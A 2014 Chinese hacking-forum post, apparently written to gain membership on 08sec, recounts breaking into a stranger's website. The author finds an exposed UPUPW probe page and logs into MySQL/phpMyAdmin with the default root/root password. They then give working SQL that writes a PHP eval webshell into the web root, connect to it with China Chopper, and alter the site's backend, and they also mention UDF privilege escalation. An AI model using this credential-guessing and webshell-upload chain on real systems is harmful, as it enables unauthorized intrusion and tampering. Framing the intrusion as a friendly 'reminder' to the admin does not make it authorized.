|
##########################################
# Title :记一次检测网站(08sec申请转正帖)
# Time : 2014年5月26日
# Team :
# Author : esaaset
# 首发 : 08安全小组
#######################################
说明,本人菜鸟一个,第一次在08sec上发贴.
今天碰到一个站
最近看小说找到一个,二级域名的,
一看DEDE的图标,就想会不会比较容易进去呢?
于是,换了下主域名进去.
UPUPW探针显示出来了,看来没有默认首页呀.
刚好前几天装过这个.这个用的是国产 kangle的反向代理服务器.支持ASP和PHP,和MYSQL.感觉比win2003的IIS好用呀.
页面下面有这个
随手试了下.密码:root 连接显示成功了.
??这管理员都不改密码?,不行我得提醒他,要不然这个站被人日了.偶看不了小说了,怎摸办?
回到上面,
先打开PHP详细信息,查看物理地址.
D:\upupw\htdocs\
点开phpMyAdmin,输入帐号root密码:root;进phpMyAdmin
再通过数据库,导出一个PHP文件
随便选个数据库,然后执行以下的sql
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'D:/upupw/htdocs/eval.php';
Drop TABLE IF EXISTS a;
好了,拿上菜刀.
唉,目录权限都没有设置.裸奔呀.
算了,在他的后台加上几个字提醒下.
希望管理员进来后看得到.
接下来呢,传一个udf提权?,算了,我是好人.,撤了.
其实这篇文章一点技术含量都没有,主要是管理员的大意,才让菜鸟我可以畅通无阻.同时想提醒站长安全要注意.
这就是全部过程,希望在08CMS中学习更多知识.
|
|